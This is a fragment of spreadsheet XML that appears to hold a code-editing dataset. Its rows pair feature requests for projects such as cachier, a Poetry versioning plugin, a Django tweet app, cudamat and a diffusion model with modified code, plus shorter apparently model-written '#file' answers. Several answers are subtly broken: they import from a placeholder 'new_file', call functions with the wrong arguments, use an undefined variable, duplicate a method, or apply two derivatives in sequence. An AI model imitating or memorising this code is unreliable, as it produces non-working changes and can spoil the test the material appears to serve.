1\n    result2 = func_with_defaults(1, 2)\n    assert result2 == 3\n    assert call_count_with_defaults == 1  # Should use cache\n\n    # With include_defaults=False, func_without_defaults(1) and func_without_defaults(1, 2) should use different cache\n    assert call_count_without_defaults == 0\n    result3 = func_without_defaults(1)\n    assert result3 == 3\n    assert call_count_without_defaults == 1\n    result4 = func_without_defaults(1, 2)\n    assert result4 == 3\n    assert call_count_without_defaults == 2  # Should NOT use cache\n\n\ndef test_include_defaults_runtime_override(tmpdir):\n    """Test that include_defaults can be overridden at runtime."""\n    call_count = 0\n\n    @cachier.cachier(cache_dir=tmpdir, include_defaults=True)\n    def func_with_defaults(a, b=2):\n        nonlocal call_count\n        call_count += 1\n        return a + b\n\n    func_with_defaults.clear_cache()\n    assert call_count == 0\n    result1 = func_with_defaults(1)\n    assert result1 == 3\n    assert call_count == 1\n    # Override at runtime to exclude defaults\n    result2 = func_with_defaults(1, 2, cachier__include_defaults=False)\n    assert result2 == 3\n    assert call_count == 2  # Should recalculate with different cache key'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def _convert_args_kwargs(func, _is_method: bool, args: tuple, kwds: dict) -&gt; dict:\n    """Convert mix of positional and keyword arguments to aggregated kwargs."""\n    # unwrap if the function is functools.partial\n    if hasattr(func, \'func\'):\n        args = func.args + args\n        kwds.update({k: v for k, v in func.keywords.items() if k not in kwds})\n        func = func.func\n    func_params = list(inspect.signature(func).parameters)\n    args_as_kw = dict(\n        zip(func_params[1:], args[1:])\n        if _is_method\n        else zip(func_params, args)\n    )\n    # init with default values\n    kwargs = {\n        k: v.default\n        for k, v in inspect.signature(func).parameters.items()\n        if v.default is not inspect.Parameter.empty\n    }\n    # merge args expanded as kwargs and the original kwds\n    kwargs.update(dict(**args_as_kw, **kwds))\n    # Modify: Call the new feature function to handle default keyword arguments\n    return new_feature_function(kwargs)\n\n# New: Import the new feature function\nfrom new_file import new_feature_function', '#file 2': "def func_wrapper(*args, **kwds):\n    nonlocal allow_none\n    _allow_none = _update_with_defaults(allow_none, 'allow_none', kwds)\n    # print('Inside general wrapper for {}.'.format(func.__name__))\n    ignore_cache = _pop_kwds_with_deprecation(kwds, 'ignore_cache', False)\n    overwrite_cache = _pop_kwds_with_deprecation(kwds, 'overwrite_cache', False)\n    verbose = _pop_kwds_with_deprecation(kwds, 'verbose_cache', False)\n    ignore_cache = kwds.pop('cachier__skip_cache', ignore_cache)\n    overwrite_cache = kwds.pop('cachier__overwrite_cache', overwrite_cache)\n    verbose = kwds.pop('cachier__verbose', verbose)\n    _stale_after = _update_with_defaults(stale_after, 'stale_after', kwds)\n    _next_time = _update_with_defaults(next_time, 'next_time', kwds)\n    # merge args expanded as kwargs and the original kwds\n    kwargs = _convert_args_kwargs(\n        func, _is_method=core.func_is_method, args=args, kwds=kwds\n    )\n    _print = lambda x: None  # noqa: E731\n    if verbose:\n        _print = print\n    if ignore_cache or not _default_params['caching_enabled']:\n        return (\n            func(args[0], **kwargs)\n            if core.func_is_method\n            else func(**kwargs)\n        )\n    key, entry = core.get_entry((), kwargs)\n    if overwrite_cache:\n        return _calc_entry(core, key, func, args, kwds)\n    if entry is None:\n        _print('No entry found. No current calc. Calling like a boss.')\n        return _calc_entry(core, key, func, args, kwds)\n    _print('Entry found.')\n    if _allow_none or entry.get('value', None) is not None:\n        _print('Cached result found.')\n        now = datetime.datetime.now()\n        if now - entry['time'] &lt;= _stale_after:\n            _print('And it is fresh!')\n            return entry['value']\n        _print('But it is stale... :(')\n        if entry['being_calculated']:\n            if _next_time:\n                _print('Returning stale.')\n                return entry['value']  # return stale val\n            _print('Already calc. Waiting on change.')\n            try:\n                return core.wait_on_entry_calc(key)\n            except RecalculationNeeded:\n                return _calc_entry(core, key, func, args, kwds)\n        if _next_time:\n            _print('Async calc and return stale')\n            try:\n                core.mark_entry_being_calculated(key)\n                _get_executor().submit(\n                    _function_thread, core, key, func, args, kwds\n                )\n            finally:\n                core.mark_entry_not_calculated(key)\n            return entry['value']\n        _print('Calling decorated function and waiting')\n        return _calc_entry(core, key, func, args, kwds)\n    if entry['being_calculated']:\n        _print('No value but being calculated. Waiting.')\n        try:\n            return core.wait_on_entry_calc(key)\n        except RecalculationNeeded:\n            return _calc_entry(core, key, func, args, kwds)\n    _print('No entry found. No current calc. Calling like a boss.')\n    return _calc_entry(core, key, func, args, kwds)", '#file 3': 'def test_default_kwargs_handling():\n    count = 0\n    @cachier.cachier()\n    def dummy_func(a, b=2):\n        nonlocal count\n        count += 1\n        return a + b\n    dummy_func.clear_cache()\n    assert count == 0\n    assert dummy_func(1) == 3\n    assert dummy_func(a=1) == 3\n    assert dummy_func(a=1, b=2) == 3\n    assert count == 1', '#file 4': 'def new_feature_function(a, b=2):\n    return a + b * 2'}</t>
  </si>
  <si>
    <t>{'called_code_segment': '_apply_version_via_plugin(poetry: Poetry, retain: bool = False, force: bool = False, standalone: bool = False, io: bool = True) -&gt; None', 'invoking_code_segment': 'def _apply_version(self, event: ConsoleCommandEvent, kind: str, dispatcher: EventDispatcher) -&gt; None and def handle(self) -&gt; int in DynamicVersioningCommand', 'feature_description': 'Add a new feature that prints a message indicating that a new feature has been applied to the Poetry instance. This message will be printed to stderr when the dynamic versioning is successfully applied.', 'modified_complete_code': '# File 1: poetry-dynamic-versioning/poetry_dynamic_versioning/plugin.py\n\ndef _apply_version_via_plugin(\n    poetry: Poetry,\n    retain: bool = False,\n    force: bool = False,\n    standalone: bool = False,\n    # fmt: off\n    io: bool = True\n    # fmt: on\n) -&gt; None:\n    name = _get_and_apply_version(\n        pyproject=poetry.pyproject.data,\n        pyproject_path=_get_pyproject_path_from_poetry(poetry.pyproject),\n        retain=retain,\n        force=force,\n        io=io,\n    )\n    if name:\n        version = _state.projects[name].version\n\n        # Would be nice to use `.set_version()`, but it\'s only available on\n        # Poetry\'s `ProjectPackage`, not poetry-core\'s `ProjectPackage`.\n        poetry._package._version = PoetryCoreVersion.parse(version)\n        poetry._package._pretty_version = version\n\n        #New: Print message indicating new feature has been applied\n        import sys\n        print("Dynamic versioning feature applied to Poetry instance: version {}".format(version), file=sys.stderr)\n\n        if standalone:\n            cli.report_apply(name)\n\n\nclass DynamicVersioningCommand(Command):\n    name = cli.Command.dv\n    description = cli.Help.main\n\n    def __init__(self, application: Application):\n        super().__init__()\n        self._application = application\n\n    def handle(self) -&gt; int:\n        _state.cli_mode = True\n        #Modify: Call _apply_version_via_plugin which now includes the new feature message\n        _apply_version_via_plugin(self._application.poetry, retain=True, force=True, standalone=True)\n        return 0\n\n\nclass DynamicVersioningPlugin(ApplicationPlugin):\n    def __init__(self):\n        self._application = None\n\n    def activate(self, application: Application) -&gt; None:\n        self._application = application\n\n        application.command_loader.register_factory(cli.Command.dv, lambda: DynamicVersioningCommand(application))\n        application.command_loader.register_factory(\n            cli.Command.dv_enable, lambda: DynamicVersioningEnableCommand(application)\n        )\n\n        try:\n            local = self._application.poetry.pyproject.data\n        except RuntimeError:\n            # We\'re not in a Poetry project directory\n            return\n\n        cli.validate(standalone=False, config=local)\n\n        config = _get_config(local)\n        if not config["enable"]:\n            return\n\n        application.event_dispatcher.add_listener(COMMAND, self._apply_version)\n        application.event_dispatcher.add_listener(SIGNAL, self._revert_version)\n        application.event_dispatcher.add_listener(TERMINATE, self._revert_version)\n        application.event_dispatcher.add_listener(ERROR, self._revert_version)\n\n    def _apply_version(self, event: ConsoleCommandEvent, kind: str, dispatcher: EventDispatcher) -&gt; None:\n        if not _should_apply(event.command.name):\n            return\n\n        io = _should_apply_with_io(event.command.name)\n\n        #Modify: Call _apply_version_via_plugin which now includes the new feature message\n        _apply_version_via_plugin(self._application.poetry, io=io)\n        _patch_dependency_versions(io)\n\n    def _revert_version(self, event: ConsoleCommandEvent, kind: str, dispatcher: EventDispatcher) -&gt; None:\n        if not _should_apply(event.command.name):\n            return\n\n        if not _should_apply_with_io(event.command.name):\n            return\n\n        _revert_version()'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def _apply_version_via_plugin(poetry: Poetry, retain: bool = False, force: bool = False, standalone: bool = False, io: bool = True) -&gt; None:\n    name = _get_and_apply_version(\n        pyproject=poetry.pyproject.data,\n        pyproject_path=_get_pyproject_path_from_poetry(poetry.pyproject),\n        retain=retain,\n        force=force,\n        io=io,\n    )\n    if name:\n        version = _state.projects[name].version\n        poetry._package._version = PoetryCoreVersion.parse(version)\n        poetry._package._pretty_version = version\n        if standalone:\n            cli.report_apply(name)\n    #Modify: Invoke new feature function\n    new_feature_function(poetry)', '#file 2': 'def _apply_version(self, event: ConsoleCommandEvent, kind: str, dispatcher: EventDispatcher) -&gt; None:\n    if not _should_apply(event.command.name):\n        return\n    io = _should_apply_with_io(event.command.name)\n    _apply_version_via_plugin(self._application.poetry, io=io)\n    _patch_dependency_versions(io)', '#file 3': 'def handle(self) -&gt; int:\n    _state.cli_mode = True\n    _apply_version_via_plugin(self._application.poetry, retain=True, force=True, standalone=True)\n    return 0', '#file 4': "#New: New feature function\ndef new_feature_function(poetry: Poetry) -&gt; None:\n    # New feature implementation\n    print('New feature applied to Poetry instance:', poetry)"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class Tweet(models.Model) with serialize() method and TweetCreateSerializer usage in tweet_create_view', 'invoking_code_segment': 'tweet_create_view function in tweets/api/views.py that calls TweetCreateSerializer and Tweet.objects.create()', 'feature_description': 'Add support for creating tweets with media files by enhancing the Tweet model to properly handle image/file uploads, updating the TweetCreateSerializer to validate and process media files, and modifying the tweet_create_view to accept and process multipart form data with file attachments.', 'modified_complete_code': '# File 1: Tweetme-2/tweets/models.py\nimport random\nfrom django.conf import settings\nfrom django.db import models\nfrom django.db.models import Q\nimport os\n\nUser = settings.AUTH_USER_MODEL\n\nclass TweetLike(models.Model):\n    user = models.ForeignKey(User, on_delete=models.CASCADE)\n    tweet = models.ForeignKey("Tweet", on_delete=models.CASCADE)\n    timestamp = models.DateTimeField(auto_now_add=True)\n\nclass TweetQuerySet(models.QuerySet):\n    def by_username(self, username):\n        return self.filter(user__username__iexact=username)\n\n    def feed(self, user):\n        profiles_exist = user.following.exists()\n        followed_users_id = []\n        if profiles_exist:\n            followed_users_id = user.following.values_list("user__id", flat=True)\n        return self.filter(\n            Q(user__id__in=followed_users_id) |\n            Q(user=user)\n        ).distinct().order_by("-timestamp")\n\nclass TweetManager(models.Manager):\n    def get_queryset(self, *args, **kwargs):\n        return TweetQuerySet(self.model, using=self._db)\n\n    def feed(self, user):\n        return self.get_queryset().feed(user)\n\nclass Tweet(models.Model):\n    parent = models.ForeignKey("self", null=True, on_delete=models.SET_NULL)\n    user = models.ForeignKey(User, on_delete=models.CASCADE, related_name="tweets")\n    likes = models.ManyToManyField(User, related_name=\'tweet_user\', blank=True, through=TweetLike)\n    content = models.TextField(blank=True, null=True)\n    # Modify: Enhanced image field with more flexible file handling\n    image = models.FileField(upload_to=\'images/\', blank=True, null=True, help_text="Supported formats: jpg, jpeg, png, gif, mp4, mov, avi")\n    # New: Add field to track if media is attached\n    has_media = models.BooleanField(default=False)\n    timestamp = models.DateTimeField(auto_now_add=True)\n\n    objects = TweetManager()\n    \n    class Meta:\n        ordering = [\'-id\']\n    \n    @property\n    def is_retweet(self):\n        return self.parent != None\n    \n    # New: Method to validate media file\n    def validate_media_file(self):\n        if self.image:\n            allowed_extensions = (\'jpg\', \'jpeg\', \'png\', \'gif\', \'mp4\', \'mov\', \'avi\', \'webm\')\n            file_ext = os.path.splitext(self.image.name)[1].lower().lstrip(\'.\')\n            if file_ext not in allowed_extensions:\n                raise ValueError(f"File type .{file_ext} is not allowed")\n            max_size = 50 * 1024 * 1024  # 50MB\n            if self.image.size &gt; max_size:\n                raise ValueError("File size exceeds 50MB limit")\n    \n    # Modify: Updated serialize method to include media information\n    def serialize(self):\n        return {\n            "id": self.id,\n            "content": self.content,\n            "likes": random.randint(0, 200),\n            # New: Include media information\n            "has_media": self.has_media,\n            "image_url": self.image.url if self.image else None\n        }\n\n# File 2: Tweetme-2/tweets/api/views.py\nimport random\nfrom django.conf import settings\nfrom django.http import HttpResponse, Http404, JsonResponse\nfrom django.shortcuts import render, redirect\nfrom django.utils.http import is_safe_url\n\nfrom rest_framework.authentication import SessionAuthentication\nfrom rest_framework.decorators import api_view, authentication_classes, permission_classes\nfrom rest_framework.pagination import PageNumberPagination\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.parsers import MultiPartParser, FormParser\nfrom ..forms import TweetForm\nfrom ..models import Tweet\nfrom ..serializers import (\n    TweetSerializer, \n    TweetActionSerializer,\n    TweetCreateSerializer\n)\n\nALLOWED_HOSTS = settings.ALLOWED_HOSTS\n\n# Modify: Updated tweet_create_view to handle multipart form data with file uploads\n@api_view([\'POST\'])\n@permission_classes([IsAuthenticated])\ndef tweet_create_view(request, *args, **kwargs):\n    serializer = TweetCreateSerializer(data=request.data)\n    if serializer.is_valid(raise_exception=True):\n        # New: Extract media file if present\n        media_file = request.FILES.get(\'image\') if hasattr(request, \'FILES\') else None\n        tweet_obj = serializer.save(user=request.user)\n        \n        # New: Handle media file attachment and validation\n        if media_file:\n            tweet_obj.image = media_file\n            tweet_obj.has_media = True\n            try:\n                tweet_obj.validate_media_file()\n                tweet_obj.save()\n            except ValueError as e:\n                tweet_obj.delete()\n                return Response({"error": str(e)}, status=400)\n        \n        serializer = TweetCreateSerializer(tweet_obj)\n        return Response(serializer.data, status=201)\n    return Response({}, status=400)\n\n@api_view([\'GET\'])\ndef tweet_detail_view(request, tweet_id, *args, **kwargs):\n    qs = Tweet.objects.filter(id=tweet_id)\n    if not qs.exists():\n        return Response({}, status=404)\n    obj = qs.first()\n    serializer = TweetSerializer(obj)\n    return Response(serializer.data, status=200)\n\n@api_view([\'DELETE\', \'POST\'])\n@permission_classes([IsAuthenticated])\ndef tweet_delete_view(request, tweet_id, *args, **kwargs):\n    qs = Tweet.objects.filter(id=tweet_id)\n    if not qs.exists():\n        return Response({}, status=404)\n    qs = qs.filter(user=request.user)\n    if not qs.exists():\n        return Response({"message": "You cannot delete this tweet"}, status=401)\n    obj = qs.first()\n    obj.delete()\n    return Response({"message": "Tweet removed"}, status=200)\n\n@api_view([\'POST\'])\n@permission_classes([IsAuthenticated])\ndef tweet_action_view(request, *args, **kwargs):\n    serializer = TweetActionSerializer(data=request.data)\n    if serializer.is_valid(raise_exception=True):\n        data = serializer.validated_data\n        tweet_id = data.get("id")\n        action = data.get("action")\n        content = data.get("content")\n        qs = Tweet.objects.filter(id=tweet_id)\n        if not qs.exists():\n            return Response({}, status=404)\n        obj = qs.first()\n        if action == "like":\n            obj.likes.add(request.user)\n            serializer = TweetSerializer(obj)\n            return Response(serializer.data, status=200)\n        elif action == "unlike":\n            obj.likes.remove(request.user)\n            serializer = TweetSerializer(obj)\n            return Response(serializer.data, status=200)\n        elif action == "retweet":\n            new_tweet = Tweet.objects.create(\n                    user=request.user, \n                    parent=obj,\n                    content=content,\n                    )\n            serializer = TweetSerializer(new_tweet)\n            return Response(serializer.data, status=201)\n    return Response({}, status=200)\n\ndef get_paginated_queryset_response(qs, request):\n    paginator = PageNumberPagination()\n    paginator.page_size = 20\n    paginated_qs = paginator.paginate_queryset(qs, request)\n    serializer = TweetSerializer(paginated_qs, many=True, context={"request": request})\n    return paginator.get_paginated_response(serializer.data)\n\n@api_view([\'GET\'])\n@permission_classes([IsAuthenticated])\ndef tweet_feed_view(request, *args, **kwargs):\n    user = request.user\n    qs = Tweet.objects.feed(user)\n    return get_paginated_queryset_response(qs, request)\n\n@api_view([\'GET\'])\ndef tweet_list_view(request, *args, **kwargs):\n    qs = Tweet.objects.all()\n    username = request.GET.get(\'username\')\n    if username != None:\n        qs = qs.by_username(username)\n    return get_paginated_queryset_response(qs, request)\n\ndef tweet_create_view_pure_django(request, *args, **kwargs):\n    user = request.user\n    if not request.user.is_authenticated:\n        user = None\n        if request.is_ajax():\n            return JsonResponse({}, status=401)\n        return redirect(settings.LOGIN_URL)\n    form = TweetForm(request.POST or None, request.FILES or None)\n    next_url = request.POST.get("next") or None\n    if form.is_valid():\n        obj = form.save(commit=False)\n        obj.user = user\n        # New: Check if media file is attached\n        if request.FILES.get(\'image\'):\n            obj.has_media = True\n        obj.save()\n        if request.is_ajax():\n            return JsonResponse(obj.serialize(), status=201)\n        if next_url != None and is_safe_url(next_url, ALLOWED_HOSTS):\n            return redirect(next_url)\n        form = TweetForm()\n    if form.errors:\n        if request.is_ajax():\n            return JsonResponse(form.errors, status=400)\n    return render(request, \'components/form.html\', context={"form": form})\n\ndef tweet_list_view_pure_django(request, *args, **kwargs):\n    qs = Tweet.objects.all()\n    tweets_list = [x.serialize() for x in qs]\n    data = {\n        "isUser": False,\n        "response": tweets_list\n    }\n    return JsonResponse(data)\n\ndef tweet_detail_view_pure_django(request, tweet_id, *args, **kwargs):\n    data = {\n        "id": tweet_id,\n    }\n    status = 200\n    try:\n        obj = Tweet.objects.get(id=tweet_id)\n        data[\'content\'] = obj.content\n        # New: Include media information in response\n        data[\'has_media\'] = obj.has_media\n        if obj.image:\n            data[\'image_url\'] = obj.image.url\n    except:\n        data[\'message\'] = "Not found"\n        status = 404\n    return JsonResponse(data, status=status)'}</t>
  </si>
  <si>
    <t>{'#file 1': "def tweet_create_view(request, *args, **kwargs):\n    if 'media' in request.data:\n        return tweet_create_with_media_view(request, *args, **kwargs)  #Modify\n    serializer = TweetCreateSerializer(data=request.data)\n    if serializer.is_valid(raise_exception=True):\n        serializer.save(user=request.user)\n        return Response(serializer.data, status=201)\n    return Response({}, status=400)", '#file 2': "urlpatterns = [\n    path('', tweet_list_view),\n    path('feed/', tweet_feed_view),\n    path('action/', tweet_action_view),\n    path('create/', tweet_create_view),\n    path('create-with-media/', tweet_create_with_media_view),  #New\n    path('&lt;int:tweet_id&gt;/', tweet_detail_view),\n    path('&lt;int:tweet_id&gt;/delete/', tweet_delete_view),\n]", '#file 3': 'def tweet_create_view_pure_django(request, *args, **kwargs):\n    user = request.user\n    if not request.user.is_authenticated:\n        user = None\n        if request.is_ajax():\n            return JsonResponse({}, status=401)\n        return redirect(settings.LOGIN_URL)\n    form = TweetForm(request.POST or None, request.FILES or None)  #Modify\n    next_url = request.POST.get("next") or None\n    if form.is_valid():\n        obj = form.save(commit=False)\n        obj.user = user\n        obj.save()\n        if request.is_ajax():\n            return JsonResponse(obj.serialize(), status=201)\n        if next_url != None and is_safe_url(next_url, ALLOWED_HOSTS):\n            return redirect(next_url)\n        form = TweetForm()\n    if form.errors:\n        if request.is_ajax():\n            return JsonResponse(form.errors, status=400)\n    return render(request, \'components/form.html\', context={"form": form})', '#file 4': 'def tweet_create_with_media_view(request, *args, **kwargs):\n    serializer = TweetCreateWithMediaSerializer(data=request.data)\n    if serializer.is_valid(raise_exception=True):\n        serializer.save(user=request.user)\n        return Response(serializer.data, status=201)\n    return Response({}, status=400)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'mult_by_sigmoid_deriv function in learn.py that computes target = target * acts * (1 - acts)', 'invoking_code_segment': 'cl.mult_by_sigmoid_deriv(delta, h) call in nn_cudamat.py during backpropagation', 'feature_description': 'Add support for tanh activation function in backpropagation by implementing mult_by_tanh_deriv function that computes target = target * (1 - acts^2), allowing neural networks to use tanh units instead of just sigmoid units', 'modified_complete_code': '# File 1: cudamat/cudamat/learn.py\nimport os\nimport ctypes as ct\nimport numpy as np\nfrom cudamat import load_library, generate_exception\n\n_cudalearn = load_library(\'libcudalearn\')\n\n_cudalearn.mult_by_sigmoid_deriv.restype = ct.c_int\n#New\n_cudalearn.mult_by_tanh_deriv.restype = ct.c_int\n\ndef mult_by_sigmoid_deriv(target, acts):\n    """\n    target = target * acts * (1 - acts)\n    Useful for doing backprop in neural networks with logistic units.\n    """\n    err_code = _cudalearn.mult_by_sigmoid_deriv(target.p_mat, acts.p_mat)\n    if err_code:\n        raise generate_exception(err_code)\n\n#New\ndef mult_by_tanh_deriv(target, acts):\n    """\n    target = target * (1 - acts^2)\n    Useful for doing backprop in neural networks with tanh units.\n    """\n    err_code = _cudalearn.mult_by_tanh_deriv(target.p_mat, acts.p_mat)\n    if err_code:\n        raise generate_exception(err_code)\n\n# File 2: cudamat/examples/nn_cudamat.py\n# This file shows how to implement a single hidden layer neural network for\n# performing binary classification on the GPU using cudamat.\n\nfrom __future__ import division\nimport pdb\nimport time\nimport numpy as np\nimport cudamat as cm\nfrom cudamat import learn as cl\nimport util\n\n# initialize CUDA\ncm.cublas_init()\n\n# load data\nutil.load(\'mnist49.dat\', globals())\n\n# Put training data onto the GPU.\ndat_train = dat_train/255.\ndat_train = dat_train - (np.mean(dat_train, 1)+10**-8)[:, np.newaxis]\ndev_train = cm.CUDAMatrix(dat_train)\ndev_lbl = cm.CUDAMatrix(lbl_train)\n\n# training parameters\nepsilon = 0.01\nmomentum = 0.9\n\nnum_epochs = 30\nbatch_size = 128\nnum_batches = dat_train.shape[1]//batch_size\n\n# model parameters\ndim_in = dat_train.shape[0]\ndim_out = 1\nnum_hid = 1024\n\n#Modify - Add activation function selection\nactivation_fn = \'tanh\'  # Can be \'sigmoid\' or \'tanh\'\n\n# initialize weights\nw_w1 = cm.CUDAMatrix(dim_in ** -0.5 * np.random.randn(dim_in, num_hid))\nw_b1 = cm.CUDAMatrix(np.zeros((num_hid, 1)))\nw_w2 = cm.CUDAMatrix(num_hid ** -0.5 * np.random.randn(num_hid, dim_out))\nw_b2 = cm.CUDAMatrix(np.zeros((dim_out, 1)))\n\n# initialize weight update matrices\nwu_w1 = cm.empty(w_w1.shape).assign(0)\nwu_b1 = cm.empty(w_b1.shape).assign(0)\nwu_w2 = cm.empty(w_w2.shape).assign(0)\nwu_b2 = cm.empty(w_b2.shape).assign(0)\n\n# initialize temporary storage\nh = cm.empty((num_hid, batch_size))\nout = cm.empty((dim_out, batch_size))\ndelta = cm.empty((num_hid, batch_size))\n\n# Train neural network.\nstart_time = time.time()\nfor epoch in range(num_epochs):\n    print("Epoch %i" % (epoch + 1))\n    err = []\n\n    for batch in range(num_batches):\n        # get current minibatch\n        inp = dev_train.slice(batch*batch_size,(batch + 1)*batch_size)\n        target = dev_lbl.slice(batch*batch_size,(batch + 1)*batch_size)\n\n        # forward pass\n        cm.dot(w_w1.T, inp, target = h)\n\n        h.add_col_vec(w_b1)\n        #Modify - Apply selected activation function\n        if activation_fn == \'tanh\':\n            h.apply_tanh()\n        else:\n            h.apply_sigmoid()\n\n        cm.dot(w_w2.T, h, target = out)\n\n        out.add_col_vec(w_b2)\n        out.apply_sigmoid()\n\n        # back prop errors\n        out.subtract(target) # compute error\n\n        # gradients for w_w2 and w_b2\n        wu_w2.add_dot(h, out.T, beta = momentum)\n        wu_b2.add_sums(out, axis = 1, beta = momentum)\n\n        # compute delta\n        cm.dot(w_w2, out, target = delta)\n\n        #Modify - Apply appropriate derivative based on activation function\n        if activation_fn == \'tanh\':\n            cl.mult_by_tanh_deriv(delta, h)\n        else:\n            cl.mult_by_sigmoid_deriv(delta, h)\n\n        # gradients for w_w1 and w_b1\n        wu_w1.add_dot(inp, delta.T, beta = momentum)\n        wu_b1.add_sums(delta, axis = 1, beta = momentum)\n\n        # update weights\n        w_w1.subtract_mult(wu_w1, epsilon/batch_size)\n        w_b1.subtract_mult(wu_b1, epsilon/batch_size)\n        w_w2.subtract_mult(wu_w2, epsilon/batch_size)\n        w_b2.subtract_mult(wu_b2, epsilon/batch_size)\n\n        # calculate error on current minibatch \n        err.append(np.abs(out.asarray())&gt;0.5)\n\n    print("Training misclassification rate: %f" % np.mean(err))\n    print("Time: %f" % (time.time() - start_time))\n\n# Evaluate neural network on test data.\n\n# Load test data onto the GPU.\ndat_test = dat_test/255.\ndat_test = dat_test - np.mean(dat_test, 1)[:, np.newaxis]\ndev_test = cm.CUDAMatrix(dat_test)\ndev_lbl = cm.CUDAMatrix(lbl_test)\n\n# Initalize temporary storage.\nh = cm.empty((num_hid, dat_test.shape[1]))\nout = cm.empty((dim_out, dat_test.shape[1]))\n\n# forward pass\ncm.dot(w_w1.T, dev_test, target = h)\n\nh.add_col_vec(w_b1)\n#Modify - Apply selected activation function\nif activation_fn == \'tanh\':\n    h.apply_tanh()\nelse:\n    h.apply_sigmoid()\n\ncm.dot(w_w2.T, h, target = out)\n\nout.add_col_vec(w_b2)\nout.apply_sigmoid()\n\n# compute error\nout.subtract(dev_lbl)\n\nprint("Testing misclassification rate: %f" % np.mean(np.abs(out.asarray())&gt;0.5))\n\ncm.cublas_shutdown()'}</t>
  </si>
  <si>
    <t>{'file_1': 'def mult_by_sigmoid_deriv(target, acts):\n    """\n    target = target * acts * (1 - acts)\n\n    Useful for doing backprop in neural networks with logistic units.\n    """\n\n    err_code = _cudalearn.mult_by_sigmoid_deriv(target.p_mat, acts.p_mat)\n    if err_code:\n        raise generate_exception(err_code)\n\n#Modify\ndef mult_by_tanh_deriv(target, acts):\n    """\n    target = target * (1 - acts^2)\n\n    Useful for doing backprop in neural networks with tanh units.\n    """\n\n    err_code = _cudalearn.mult_by_tanh_deriv(target.p_mat, acts.p_mat)\n    if err_code:\n        raise generate_exception(err_code)', 'file_2': '# delta = delta * h * (1 - h)\ncl.mult_by_sigmoid_deriv(delta, h)\n\n#Modify for tanh activation\n# delta = delta * (1 - h^2)\ncl.mult_by_tanh_deriv(delta, h)', 'file_3': 'N/A', 'file_4': '#New\ndef mult_by_tanh_deriv(target, acts):\n    """\n    target = target * (1 - acts^2)\n\n    Useful for doing backprop in neural networks with tanh units.\n    """\n\n    err_code = _cudalearn.mult_by_tanh_deriv(target.p_mat, acts.p_mat)\n    if err_code:\n        raise generate_exception(err_code)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'UNetModel.forward(self, x, timesteps, y=None) method in ddrm/guided_diffusion/unet.py', 'invoking_code_segment': 'Diffusion.sample_image(self, x, model, H_funcs, y_0, sigma_0, last=True, cls_fn=None, classes=None) method in ddrm/runners/diffusion.py which calls efficient_generalized_steps that uses the model', 'feature_description': "Enhance the output of the model by scaling it up by a factor of 1.1 to amplify the model's predictions", 'modified_complete_code': '# File 1: ddrm/guided_diffusion/unet.py - Modified forward method in UNetModel class\n\nclass UNetModel(nn.Module):\n    # ... existing code ...\n    \n    def forward(self, x, timesteps, y=None):\n        """\n        Apply the model to an input batch.\n\n        :param x: an [N x C x ...] Tensor of inputs.\n        :param timesteps: a 1-D batch of timesteps.\n        :param y: an [N] Tensor of labels, if class-conditional.\n        :return: an [N x C x ...] Tensor of outputs.\n        """\n        assert (y is not None) == (\n            self.num_classes is not None\n        ), "must specify y if and only if the model is class-conditional"\n\n        hs = []\n        emb = self.time_embed(timestep_embedding(timesteps, self.model_channels))\n\n        if self.num_classes is not None:\n            assert y.shape == (x.shape[0],)\n            emb = emb + self.label_emb(y)\n\n        h = x.type(self.dtype)\n        for module in self.input_blocks:\n            h = module(h, emb)\n            hs.append(h)\n        h = self.middle_block(h, emb)\n        for module in self.output_blocks:\n            h = th.cat([h, hs.pop()], dim=1)\n            h = module(h, emb)\n        h = h.type(x.dtype)\n        output = self.out(h)\n        #Modify: Scale output by factor of 1.1\n        output = output * 1.1\n        return output\n\n\n# File 2: ddrm/runners/diffusion.py - Modified sample_image method in Diffusion class\n\nclass Diffusion(object):\n    # ... existing code ...\n    \n    def sample_image(self, x, model, H_funcs, y_0, sigma_0, last=True, cls_fn=None, classes=None):\n        skip = self.num_timesteps // self.args.timesteps\n        seq = range(0, self.num_timesteps, skip)\n        \n        #Modify: Pass scaling factor to efficient_generalized_steps\n        x = efficient_generalized_steps(x, seq, model, self.betas, H_funcs, y_0, sigma_0, \\\n            etaB=self.args.etaB, etaA=self.args.eta, etaC=self.args.eta, cls_fn=cls_fn, classes=classes, scale_factor=1.1)\n        if last:\n            x = x[0][-1]\n        return x'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def sample_image(self, x, model, H_funcs, y_0, sigma_0, last=True, cls_fn=None, classes=None):\n    skip = self.num_timesteps // self.args.timesteps\n    seq = range(0, self.num_timesteps, skip)\n    \n    x = efficient_generalized_steps(x, seq, model, self.betas, H_funcs, y_0, sigma_0, \\\n        etaB=self.args.etaB, etaA=self.args.eta, etaC=self.args.eta, cls_fn=cls_fn, classes=classes)\n    if last:\n        x = x[0][-1]\n    return x\n\n#Modify\nfrom new_file import new_feature_function\n\ndef sample_image(self, x, model, H_funcs, y_0, sigma_0, last=True, cls_fn=None, classes=None):\n    skip = self.num_timesteps // self.args.timesteps\n    seq = range(0, self.num_timesteps, skip)\n    \n    x = efficient_generalized_steps(x, seq, model, self.betas, H_funcs, y_0, sigma_0, \\\n        etaB=self.args.etaB, etaA=self.args.eta, etaC=self.args.eta, cls_fn=cls_fn, classes=classes)\n    if last:\n        x = x[0][-1]\n    x = new_feature_function(x, model, t)\n    return x', '#file 2': 'def sample_sequence(self, model, cls_fn=None):\n    ...\n    x, _ = self.sample_image(x, model, H_funcs, y_0, sigma_0, last=False, cls_fn=cls_fn, classes=classes)\n    ...', '#file 3': 'def efficient_generalized_steps(x, seq, model, betas, H_funcs, y_0, sigma_0, etaB=1, etaA=0, etaC=0, cls_fn=None, classes=None):\n    ...\n    x_0_predict = model(x_t, t.float())', '#file 4': '#New\ndef new_feature_function(x, model, t):\n    # New feature implementation\n    enhanced_x = model(x, t) * 1.1  # Example enhancement\n    return enhanced_x'}</t>
  </si>
  <si>
